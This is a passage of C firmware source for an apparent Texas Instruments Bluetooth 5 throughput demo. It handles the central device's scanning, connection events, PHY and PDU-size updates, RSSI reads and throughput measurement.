octets)\nstatic uint16 maxPduSize;\n\n// Array of RSSI read structures\nstatic readRssi_t readRssi[MAX_NUM_BLE_CONNS];\n\n// Search String for Throughput Periphereal\nstatic const char searchStr[] = {\n 0x12, // length of this data\n GAP_ADTYPE_LOCAL_NAME_COMPLETE,\n 'T',\n 'h',\n 'r',\n 'o',\n 'u',\n 'g',\n 'h',\n 'p',\n 'u',\n 't',\n ' ',\n 'P',\n 'e',\n 'r',\n 'i',\n 'p',\n 'h',\n};\n\n// Received byte counters + circular buffer for Throughput Data\nstatic volatile uint32_t bytesRecvd = 0;\n#define CB_SIZE 10\nstatic uint32_t bytesRecvd_cb[CB_SIZE];\nstatic int bytesRecvd_cb_index = 0;\nstatic bool cbBufferFilled = false;\n\n// Strings for PHY\nstatic uint8_t* phyName[] = {\n \"1 Mbps\", \"2 Mbps\",\n \"Coded:S2\", \"Coded:S8\",\n \"Coded\"\n};\n\n// PHY Index\nstatic uint8_t phyIndex = 0;\nstatic bool phyConfirm = true;\n\n// Pointer to requested PHY index\nstatic uint8_t* phyClock_phyIndex= 0;\n\n// PHY Options\nstatic uint16_t phyOptions = HCI_PHY_OPT_NONE;\n\nstatic throughputProfileHdl_t* throughputHandles = NULL;\n\n// Global Variables for GUI Composer\nuint16_t currentPeerTxPDUSize = 0;\nuint8_t currentPHY1M = 1;\nuint8_t currentPHY2M = 0;\nuint32_t instantRate = 0;\nuint32_t averageRate = 0;\nuint8_t currentMTUSize = 0;\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic void SimpleBLECentral_init(void);\nstatic void SimpleBLECentral_taskFxn(UArg a0, UArg a1);\n\nstatic void SimpleBLECentral_processGATTMsg(gattMsgEvent_t *pMsg);\nstatic void SimpleBLECentral_handleKeys(uint8_t shift, uint8_t keys);\nstatic void SimpleBLECentral_processStackMsg(ICall_Hdr *pMsg);\nstatic void SimpleBLECentral_processAppMsg(sbcEvt_t *pMsg);\nstatic void SimpleBLECentral_processRoleEvent(gapCentralRoleEvent_t *pEvent);\nstatic void SimpleBLECentral_processGATTDiscEvent(gattMsgEvent_t *pMsg);\nstatic void SimpleBLECentral_startDiscovery(void);\nstatic void SimpleBLECentral_addDeviceInfo(uint8_t *pAddr, uint8_t addrType, uint8_t dataType, uint8_t dataLen, uint8_t* data);\n\nstatic void SimpleBLECentral_processCmdCompleteEvt(hciEvt_CmdComplete_t *pMsg);\nstatic bStatus_t SimpleBLECentral_StartRssi(uint16_t connHandle, uint16_t period);\nstatic bStatus_t SimpleBLECentral_CancelRssi(uint16_t connHandle);\nstatic readRssi_t *SimpleBLECentral_RssiAlloc(uint16_t connHandle);\nstatic readRssi_t *SimpleBLECentral_RssiFind(uint16_t connHandle);\nstatic void SimpleBLECentral_RssiFree(uint16_t connHandle);\n\nstatic uint8_t SimpleBLECentral_eventCB(gapCentralRoleEvent_t *pEvent);\n\nvoid SimpleBLECentral_speedHandler(UArg a0);\nvoid SimpleBLECentral_PHYHandler(UArg a0);\nvoid SimpleBLECentral_startDiscHandler(UArg a0);\nvoid SimpleBLECentral_keyChangeHandler(uint8 keys);\nvoid SimpleBLECentral_readRssiHandler(UArg a0);\n\nstatic uint8_t SimpleBLECentral_enqueueMsg(uint8_t event, uint8_t status,\n void *pData);\n\nstatic void SBC_ClearDeviceList();\nstatic void SBC_NextDevice();\nstatic void SBC_ConnectToDevice();\n\n/*********************************************************************\n * EXTERN FUNCTIONS\n */\nextern void AssertHandler(uint8 assertCause, uint8 assertSubcause);\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n\n// GAP Role Callbacks\nstatic gapCentralRoleCB_t SimpleBLECentral_roleCB =\n{\n SimpleBLECentral_eventCB // Event callback\n};\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_createTask\n *\n * @brief Task creation function for the Simple BLE Peripheral.\n *\n * @param none\n *\n * @return none\n */\nvoid SimpleBLECentral_createTask(void)\n{\n Task_Params taskParams;\n\n // Configure task\n Task_Params_init(&taskParams);\n taskParams.stack = sbcTaskStack;\n taskParams.stackSize = SBC_TASK_STACK_SIZE;\n taskParams.priority = SBC_TASK_PRIORITY;\n\n Task_construct(&sbcTask, SimpleBLECentral_taskFxn, &taskParams, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_Init\n *\n * @brief Initialization function for the Simple BLE Central App Task.\n * This is called during initialization and should contain\n * any application specific initialization (ie. hardware\n * initialization/setup, table initialization, power up\n * notification).\n *\n * @param none\n *\n * @return none\n */\nstatic void SimpleBLECentral_init(void)\n{\n uint8_t i;\n\n // ******************************************************************\n // N0 STACK API CALLS CAN OCCUR BEFORE THIS CALL TO ICall_registerApp\n // ******************************************************************\n // Register the current thread as an ICall dispatcher application\n // so that the application can send and receive messages.\n ICall_registerApp(&selfEntity, &syncEvent);\n\n // Create an RTOS queue for message from profile to be sent to app.\n appMsgQueue = Util_constructQueue(&appMsg);\n\n // Setup discovery delay as a one-shot timer\n Util_constructClock(&startDiscClock, SimpleBLECentral_startDiscHandler,\n DEFAULT_SVC_DISCOVERY_DELAY, 0, false, NULL);\n\n // Setup throughput clock to run every second\n Util_constructClock(&speedClock, SimpleBLECentral_speedHandler,\n 1000, 1000, false, NULL);\n\n // Set up a PHY Clock for transitions between Coded PHYs\n Util_constructClock(&startPHYClock, SimpleBLECentral_PHYHandler,\n 0, 0, false, 0);\n\n Board_initKeys(SimpleBLECentral_keyChangeHandler);\n\n // Open Display.\n dispHandle = Display_open(SBC_DISPLAY_TYPE, NULL);\n\n // Initialize internal data\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n readRssi[i].connHandle = GAP_CONNHANDLE_ALL;\n readRssi[i].pClock = NULL;\n }\n\n // Setup Central Profile\n {\n uint8_t scanRes = DEFAULT_MAX_SCAN_RES;\n\n GAPCentralRole_SetParameter(GAPCENTRALROLE_MAX_SCAN_RES, sizeof(uint8_t),\n &scanRes);\n }\n\n // Setup GAP\n GAP_SetParamValue(TGAP_GEN_DISC_SCAN, DEFAULT_SCAN_DURATION);\n GAP_SetParamValue(TGAP_LIM_DISC_SCAN, DEFAULT_SCAN_DURATION);\n GGS_SetParameter(GGS_DEVICE_NAME_ATT, GAP_DEVICE_NAME_LEN,\n (void *)attDeviceName);\n\n // Initialize GATT Client\n VOID GATT_InitClient();\n\n // Register to receive incoming ATT Indications/Notifications\n GATT_RegisterForInd(selfEntity);\n\n // Initialize GATT attributes\n GGS_AddService(GATT_ALL_SERVICES); // GAP\n GATTServApp_AddService(GATT_ALL_SERVICES); // GATT attributes\n\n // Start the Device\n VOID GAPCentralRole_StartDevice(&SimpleBLECentral_roleCB);\n\n // Register with GAP for HCI/Host messages (for RSSI)\n GAP_RegisterForMsgs(selfEntity);\n\n // Register for GATT local events and ATT Responses pending for transmission\n GATT_RegisterForMsgs(selfEntity);\n\n /*\n * TBM stuff\n */\n\n // Set the title of the main menu\n TBM_SET_TITLE(&sbcMenuMain, \"Texas Instruments Bluetooth 5 Demo\");\n\n // Initialize Two-Button Menu module\n // Enable Scanning and connecting only\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_0, TBM_ITEM_1 | TBM_ITEM_2 | TBM_ITEM_3 | TBM_ITEM_4);\n // Only Allow Scanning\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n tbm_initTwoBtnMenu(dispHandle, &sbcMenuMain, 4, NULL);\n\n // Get Current Data Length\n HCI_LE_ReadMaxDataLenCmd();\n\n // By Default Allow Central to support any and all PHYs\n HCI_LE_SetDefaultPhyCmd(LL_PHY_USE_ANY_PHY, LL_PHY_1_MBPS | LL_PHY_2_MBPS| HCI_PHY_CODED, LL_PHY_1_MBPS | LL_PHY_2_MBPS| HCI_PHY_CODED);\n\n // Set the Transmit Power of the Device to +5dBm\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_5_DBM);\n\n // Set the RX Gain to be highest\n HCI_EXT_SetRxGainCmd(HCI_EXT_RX_GAIN_HIGH);\n\n // Display Default MTU Size (updated during MTU exchange)\n Display_print1(dispHandle, SBC_ROW_MTU, 0, \"MTU Size: %dB\", ATT_MTU_SIZE);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_taskFxn\n *\n * @brief Application task entry point for the Simple BLE Central.\n *\n * @param none\n *\n * @return events not processed\n */\nstatic void SimpleBLECentral_taskFxn(UArg a0, UArg a1)\n{\n // Initialize application\n SimpleBLECentral_init();\n\n // Application main loop\n for (;;)\n {\n uint32_t events;\n\n events = Event_pend(syncEvent, Event_Id_NONE, SBC_ALL_EVENTS,\n ICALL_TIMEOUT_FOREVER);\n\n if (events)\n {\n ICall_EntityID dest;\n ICall_ServiceEnum src;\n ICall_HciExtEvt *pMsg = NULL;\n\n if (ICall_fetchServiceMsg(&src, &dest,\n (void **)&pMsg) == ICALL_ERRNO_SUCCESS)\n {\n if ((src == ICALL_SERVICE_CLASS_BLE) && (dest == selfEntity))\n {\n // Process inter-task message\n SimpleBLECentral_processStackMsg((ICall_Hdr *)pMsg);\n }\n\n if (pMsg)\n {\n ICall_freeMsg(pMsg);\n }\n }\n\n // If RTOS queue is not empty, process app message\n if (events & SBC_QUEUE_EVT)\n {\n while (!Queue_empty(appMsgQueue))\n {\n sbcEvt_t *pMsg = (sbcEvt_t *)Util_dequeueMsg(appMsgQueue);\n if (pMsg)\n {\n // Process message\n SimpleBLECentral_processAppMsg(pMsg);\n\n // Free the space from the message\n ICall_free(pMsg);\n }\n }\n }\n\n // Instantanous Speed Event\n if (events & SBC_START_DISCOVERY_EVT)\n {\n SimpleBLECentral_startDiscovery();\n }\n\n // Speed AVG Measure Event\n if (events & SBC_MEASURE_AVG_SPEED_EVT)\n {\n // local vars\n uint32_t bitsReceived = 0;\n int i;\n\n // Determine Average from Circular Buffer\n if(cbBufferFilled)\n {\n // Average using Total Buffer Size\n for(i = 0; i < CB_SIZE; i++){\n bitsReceived += bytesRecvd_cb[i];\n }\n bitsReceived = bitsReceived/CB_SIZE;\n }\n else\n {\n // Average using Running Buffer Size (prior to buffer being filled)\n for(i = 0; i <= bytesRecvd_cb_index; i++){\n bitsReceived += bytesRecvd_cb[i];\n }\n bitsReceived = bitsReceived/(bytesRecvd_cb_index+1);\n }\n // Convert to bits\n bitsReceived = 8*bitsReceived;\n\n // Display Throughput\n Display_print3(dispHandle, SBC_ROW_AVG_THROUGHPUT, 0, \"Average Rate (kb/s): %d.%d over %d Samples\",\n (bitsReceived/1000),(bitsReceived % 1000), CB_SIZE);\n\n averageRate = (bitsReceived/1000);\n }\n\n // Toggle Throughput Event\n // Peripheral Supports Throughput - so throughput should\n // begin to be measured\n if (events & SBC_TOGGLE_THROUGHPUT_EVT)\n {\n // Variables Needed for Write\n attWriteReq_t writeReq;\n uint8_t temp = 1;\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN, NULL);\n memcpy(writeReq.pValue, &temp, THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n GATT_bm_free((gattMsg_t *)&writeReq, ATT_WRITE_REQ);\n\n Event_post(syncEvent, SBC_TOGGLE_THROUGHPUT_EVT);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should being doing throughput soon\n\n // Force the initial PDU size to be 27\n // Note: All connections are formed on 1M PHY\n SimpleBLECentral_doSetDLEPDU(0);\n\n // Enable Throughput Data Collection\n Util_startClock(&speedClock);\n }\n }\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processStackMsg\n *\n * @brief Process an incoming task message.\n *\n * @param pMsg - message to process\n *\n * @return none\n */\nstatic void SimpleBLECentral_processStackMsg(ICall_Hdr *pMsg)\n{\n switch (pMsg->event)\n {\n case GAP_MSG_EVENT:\n SimpleBLECentral_processRoleEvent((gapCentralRoleEvent_t *)pMsg);\n break;\n\n case GATT_MSG_EVENT:\n SimpleBLECentral_processGATTMsg((gattMsgEvent_t *)pMsg);\n break;\n\n case HCI_GAP_EVENT_EVENT:\n {\n // Process HCI message\n switch(pMsg->status)\n {\n case HCI_COMMAND_COMPLETE_EVENT_CODE:\n SimpleBLECentral_processCmdCompleteEvt((hciEvt_CmdComplete_t *)pMsg);\n break;\n\n case HCI_BLE_HARDWARE_ERROR_EVENT_CODE:\n AssertHandler(HAL_ASSERT_CAUSE_HARDWARE_ERROR,0);\n break;\n\n case HCI_LE_EVENT_CODE:\n {\n hciEvt_BLEPhyUpdateComplete_t *pPUC\n = (hciEvt_BLEPhyUpdateComplete_t*) pMsg;\n\n if (pPUC->BLEEventCode == HCI_BLE_PHY_UPDATE_COMPLETE_EVENT)\n {\n if (pPUC->status != SUCCESS)\n {\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"PHY Change failure\");\n }\n else\n {\n // Inform User that the PHY was Updated, and which PHY is\n // the PHY being used for the connection\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"PHY Update Complete\");\n\n // Figure out which PHY is being used\n uint8_t temp = 0;\n switch(pPUC->txPhy)\n {\n case HCI_PHY_1_MBPS:\n temp = 0;\n break;\n\n case HCI_PHY_2_MBPS:\n temp = 1;\n break;\n\n case HCI_PHY_CODED:\n temp = 4;\n break;\n }\n\n // If PhyConfirm is false, that means we initated the change\n // if that is the case, then we can use detailed information\n // for coded PHY - use phyIndex instead\n if( phyConfirm == false)\n {\n // This means that the phyIndex was assigned by us.\n // Confirm the value\n\n // Critial Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n // Confirm the change to the phyIndex\n phyConfirm = true;\n }\n Hwi_restore(key);\n }\n else\n {\n // the peer device requested the change to PHY\n // update phyIndex accordingly and display the value\n phyIndex = temp;\n }\n\n currentPHY1M = 0;\n currentPHY2M = 0;\n\n if(phyIndex == 0)\n currentPHY1M = 1;\n if(phyIndex == 1)\n currentPHY2M = 1;\n\n // Tell the use which PHY we're now using\n Display_print1(dispHandle, SBC_ROW_PHY, 0, \"Current PHY: %s\", phyName[phyIndex]);\n\n }\n }\n if(pPUC->BLEEventCode == HCI_BLE_DATA_LENGTH_CHANGE_EVENT)\n {\n hciEvt_BLEDataLengthChange_t *dleEvt = (hciEvt_BLEDataLengthChange_t *)pMsg;\n Display_print1(dispHandle, SBC_ROW_PDU, 0, \"Device RX PDU Size: %dB\", dleEvt->maxRxOctets);\n\n\t\t\t\t// GUI Composer\n currentPeerTxPDUSize = dleEvt->maxRxOctets;\n }\n }\n break;\n\n default:\n break;\n }\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processAppMsg\n *\n * @brief Central application event processing function.\n *\n * @param pMsg - pointer to event structure\n *\n * @return none\n */\nstatic void SimpleBLECentral_processAppMsg(sbcEvt_t *pMsg)\n{\n switch (pMsg->hdr.event)\n {\n case SBC_STATE_CHANGE_EVT:\n SimpleBLECentral_processStackMsg((ICall_Hdr *)pMsg->pData);\n\n // Free the stack message\n ICall_freeMsg(pMsg->pData);\n break;\n\n case SBC_KEY_CHANGE_EVT:\n SimpleBLECentral_handleKeys(0, pMsg->hdr.state);\n break;\n\n case SBC_RSSI_READ_EVT:\n {\n readRssi_t *pRssi = (readRssi_t *)pMsg->pData;\n\n // If link is up and RSSI reads active\n if (pRssi->connHandle != GAP_CONNHANDLE_ALL &&\n linkDB_Up(pRssi->connHandle))\n {\n // Restart timer\n Util_restartClock(pRssi->pClock, pRssi->period);\n\n // Read RSSI\n VOID HCI_ReadRssiCmd(pRssi->connHandle);\n }\n }\n break;\n\n case SBC_PDU_UPDATE_EVT:\n {\n // When Changing PDU Size, throughput is momentaryly stopped on the peripehral\n // side for the application to process the change.\n // During this time the throughput not reflect the correct value\n\n // Attempt to send PDU update via GATT Write\n // Variables Needed for GATT Write\n attWriteReq_t writeReq;\n uint8_t pduSize = (uint8_t) *(pMsg->pData); // Cast down to uint8_t\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_UPDATE_PDU].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_UPDATE_PHY_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_UPDATE_PHY_LEN, NULL);\n memcpy(writeReq.pValue, &pduSize, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n GATT_bm_free((gattMsg_t *)&writeReq, ATT_WRITE_REQ);\n\n // Requeue the Message - don't free the memory for PDU size yet\n SimpleBLECentral_enqueueMsg(SBC_PDU_UPDATE_EVT, SUCCESS, pMsg->pData);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should being doing throughput soon\n\n // Inform user that a Request was sent to update peer's PDU Size\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Requested Peer Change TX PDU Size to %dB\", pduSize);\n\n // Free the Allocated Memory\n if(pMsg->pData)\n {\n ICall_free(pMsg->pData);\n }\n }\n break;\n }\n case SBC_PHY_UPDATE_EVT:\n {\n // When Changing PHY, throughput is stopped on the peripehral\n // side for the application to process the change.\n // During this time the throughput not reflect the correct value\n\n // Attempt to send PHY update via GATT Write\n // Variables Needed for GATT Write\n attWriteReq_t writeReq;\n\n // Critial Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n // Assign the PHY index - so we can keep track of PHY,\n // more importantly, coded phy and which symbol rate is being used\n phyIndex = (uint8_t) *(pMsg->pData);\n // reset confirm, indicating that it's the PHY being used in the\n // connection yet.\n phyConfirm = false;\n }\n Hwi_restore(key);\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_UPDATE_PHY].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_UPDATE_PHY_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_UPDATE_PHY_LEN, NULL);\n memcpy(writeReq.pValue, &phyIndex, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n GATT_bm_free((gattMsg_t *)&writeReq, ATT_WRITE_REQ);\n\n // Requeue the Message - don't free the memory for PHY change yet\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, pMsg->pData);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should being doing throughput soon\n\n // Inform user that a Request was sent to update peer's PHY Size\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Requested Peer Change PHY to %s\", phyName[phyIndex]);\n\n // Note if we're already using coded PHY, switching between S2 and S8\n // won't produce a PHY change event.\n\n // Free the Allocated Memory\n if(pMsg->pData)\n {\n ICall_free(pMsg->pData);\n }\n }\n break;\n }\n\n case SBC_MEASURE_INST_SPEED_EVT:\n {\n uint32_t* temp = (uint32_t*)(pMsg->pData);\n\n // Note at this point, Bytes have been recorded\n uint32_t bitsReceived = *temp;\n\n // Convert Bytes to bits\n bitsReceived = 8*bitsReceived;\n\n // Display Throughput\n Display_print2(dispHandle, SBC_ROW_INST_THROUGHPUT, 0, \"Instant Rate (kb/s): %d.%d\",\n (bitsReceived/1000),(bitsReceived % 1000));\n\n // GUI Composer\n instantRate = (bitsReceived/1000);\n }\n break;\n\n default:\n // Do nothing.\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processRoleEvent\n *\n * @brief Central role event processing function.\n *\n * @param pEvent - pointer to event structure\n *\n * @return none\n */\nstatic void SimpleBLECentral_processRoleEvent(gapCentralRoleEvent_t *pEvent)\n{\n switch (pEvent->gap.opcode)\n {\n case GAP_DEVICE_INIT_DONE_EVENT:\n {\n maxPduSize = pEvent->initDone.dataPktLen;\n\n Display_print1(dispHandle, SBC_ROW_BDADDR, 0, \"This Device's BDADDR : %s\", Util_convertBdAddr2Str(pEvent->initDone.devAddr));\n Display_print0(dispHandle, SBC_ROW_ROLESTATE, 0, \"Device GAP Role: Central\");\n }\n break;\n\n case GAP_DEVICE_INFO_EVENT:\n {\n /*\n * Device Filtering can be done here for UUID or advertisement\n * Data if desired.\n *\n * We populate the devList with both the scan response data and\n * advertisement data of each device discovered\n */\n SimpleBLECentral_addDeviceInfo(pEvent->deviceInfo.addr,\n pEvent->deviceInfo.addrType,\n pEvent->deviceInfo.eventType,\n pEvent->deviceInfo.dataLen,\n pEvent->deviceInfo.pEvtData);\n }\n break;\n\n case GAP_DEVICE_DISCOVERY_EVENT:\n {\n // Initialize scan index.\n scanIdx = -1;\n\n /*\n * Note that pEvent->discCmpl contains a list of device records (NOT scan response data)\n * Scan Response Data is contained in the GAP_DEVICE_INFO_EVENT during Scanning\n * We're verifying that we got the right number of device info responses\n * If you don't care about device response data, you could just use\n * the data from the GAP_DEVICE_DISCOVERY_EVENT as your scan results list\n * as shown in the commented code below\n *\n * If we're not filtering on UUID then we should have gotten ALL of the\n * possible devices scanned in our device list.\n */\n //scanRes = pEvent->discCmpl.numDevs;\n //memcpy(devList, pEvent->discCmpl.pDevList,\n // (sizeof(gapDevRec_t) * scanRes));\n\n // Verify that we got the right number of results\n if( scanRes != pEvent->discCmpl.numDevs )\n {\n // Something went wrong and we missed a device\n // Clear Device List and Prompt a Rescan\n SBC_ClearDeviceList();\n }\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"%d Devices Found\", scanRes);\n\n if (scanRes > 0)\n {\n // Re enable all Menu Functions\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_NONE);\n\n // Display the first scan Result\n SBC_NextDevice();\n }\n else\n {\n // No Results, reenable scanning only\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n }\n }\n break;\n\n case GAP_LINK_ESTABLISHED_EVENT:\n {\n if (pEvent->gap.hdr.status == SUCCESS)\n {\n state = BLE_STATE_CONNECTED;\n connHandle = pEvent->linkCmpl.connectionHandle;\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n // Disable Scan Connect Menu, enable everything else\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_ALL, TBM_ITEM_0);\n\n // Forget about the Scan Results\n SBC_ClearDeviceList();\n\n // If service discovery not performed initiate service discovery\n Util_startClock(&startDiscClock);\n\n // Update Display\n Display_print1(dispHandle, SBC_ROW_PEER_DEVICE, 0, \"Peer Device : %s\", Util_convertBdAddr2Str(pEvent->linkCmpl.devAddr));\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Connected, Exchanging MTU\");\n Display_print0(dispHandle, SBC_ROW_PHY, 0, \"PHY: 1 Mbps\");\n\n // Start RSSI collection\n SimpleBLECentral_StartRssi(connHandle, DEFAULT_RSSI_PERIOD);\n }\n else\n {\n state = BLE_STATE_IDLE;\n connHandle = GAP_CONNHANDLE_INIT;\n discState = BLE_DISC_STATE_IDLE;\n\n // TODO: Remember scan Results and re enable menu\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Reason: %d\", pEvent->gap.hdr.status);\n }\n }\n break;\n\n case GAP_LINK_TERMINATED_EVENT:\n {\n state = BLE_STATE_IDLE;\n connHandle = GAP_CONNHANDLE_INIT;\n discState = BLE_DISC_STATE_IDLE;\n scanIdx = -1;\n\n // Cancel RSSI reads\n SimpleBLECentral_CancelRssi(pEvent->linkTerminate.connectionHandle);\n\n // Throughput as well, if enabled\n Util_stopClock(&speedClock);\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Reason: %d\", pEvent->linkTerminate.reason);\n Display_clearLine(dispHandle, SBC_ROW_PEER_DEVICE);\n Display_clearLine(dispHandle, SBC_ROW_PHY);\n Display_clearLine(dispHandle, SBC_ROW_INST_THROUGHPUT);\n Display_clearLine(dispHandle, SBC_ROW_AVG_THROUGHPUT);\n Display_clearLine(dispHandle, SBC_ROW_RSSI);\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n // Enable Scan Connect Menu, Disable everything else\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_0, TBM_ITEM_1 | TBM_ITEM_2 | TBM_ITEM_3 | TBM_ITEM_4);\n\n // No Results, reenable scanning only\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n }\n break;\n\n case GAP_LINK_PARAM_UPDATE_EVENT:\n {\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Param Update: %d\", pEvent->linkUpdate.status);\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_handleKeys\n *\n * @brief Handles all key events for this device.\n *\n * @param shift - true if in shift/alt.\n * @param keys - bit field for key events. Valid entries:\n * HAL_KEY_SW_2\n * HAL_KEY_SW_1\n *\n * @return none\n */\nstatic void SimpleBLECentral_handleKeys(uint8_t shift, uint8_t keys)\n{\n if (keys & KEY_LEFT)\n {\n // Check if the key is still pressed. WA for possible bouncing.\n if (PIN_getInputValue(Board_PIN_BUTTON0) == 0)\n {\n tbm_buttonLeft();\n }\n }\n\n if (keys & KEY_RIGHT)\n {\n // Check if the key is still pressed. WA for possible bouncing.\n if (PIN_getInputValue(Board_PIN_BUTTON1) == 0)\n {\n tbm_buttonRight();\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processGATTMsg\n *\n * @brief Process GATT messages and events.\n *\n * @return none\n */\nstatic void SimpleBLECentral_processGATTMsg(gattMsgEvent_t *pMsg)\n{\n if (state == BLE_STATE_CONNECTED)\n {\n // See if GATT server was unable to transmit an ATT response\n if (pMsg->hdr.status == blePending)\n {\n // No HCI buffer was available. App can try to retransmit the response\n // on the next connection event. Drop it for now.\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"ATT Rsp dropped %d\", pMsg->method);\n }\n else if ((pMsg->method == ATT_READ_RSP) ||\n ((pMsg->method == ATT_ERROR_RSP) &&\n (pMsg->msg.errorRsp.reqOpcode == ATT_READ_REQ)))\n {\n if (pMsg->method == ATT_ERROR_RSP)\n {\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"Read Error %d\", pMsg->msg.errorRsp.errCode);\n }\n else\n {\n // After a successful read, display the read value\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"Read rsp: %d\", pMsg->msg.readRsp.pValue[0]);\n }\n }\n else if ((pMsg->method == ATT_WRITE_RSP) ||\n ((pMsg->method == ATT_ERROR_RSP) &&\n (pMsg->msg.errorRsp.reqOpcode == ATT_WRITE_REQ)))\n {\n if (pMsg->method == ATT_ERROR_RSP)\n {\n //Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"GATT Write Error %d\", pMsg->msg.errorRsp.errCode);\n }\n else\n {\n // After a successful write, display the value that was written and\n // increment value\n // Display_print0(dispHandle, SBC_ROW_GATT_RESULT, 0, \"GATT Write Sent to Peer\");\n }\n }\n else if (pMsg->method == ATT_FLOW_CTRL_VIOLATED_EVENT)\n {\n // ATT request-response or indication-confirmation flow control is\n // violated. All subsequent ATT requests or indications will be dropped.\n // The app is informed in case it wants to drop the connection.\n\n // Display the opcode of the message that caused the violation.\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"FC Violated: %d\", pMsg->msg.flowCtrlEvt.opcode);\n }\n else if (pMsg->method == ATT_HANDLE_VALUE_NOTI)\n {\n // Critial Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n bytesRecvd += pMsg->msg.handleValueNoti.len;\n }\n Hwi_restore(key);\n }\n else if (pMsg->method == ATT_MTU_UPDATED_EVENT)\n {\n // MTU size updated\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"MTU Exchanged\");\n Display_print1(dispHandle, SBC_ROW_MTU, 0, \"MTU Size: %dB\", pMsg->msg.mtuEvt.MTU);\n\n\t // GUI Composer\n currentMTUSize = pMsg->msg.mtuEvt.MTU;\n }\n else if (discState != BLE_DISC_STATE_IDLE)\n {\n SimpleBLECentral_processGATTDiscEvent(pMsg);\n }\n } // else - in case a GATT message came after a connection has dropped, ignore it.\n\n // Needed only for ATT Protocol messages\n GATT_bm_free(&pMsg->msg, pMsg->method);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processCmdCompleteEvt\n *\n * @brief Process an incoming OSAL HCI Command Complete Event.\n *\n * @param pMsg - message to process\n *\n * @return none\n */\nstatic void SimpleBLECentral_processCmdCompleteEvt(hciEvt_CmdComplete_t 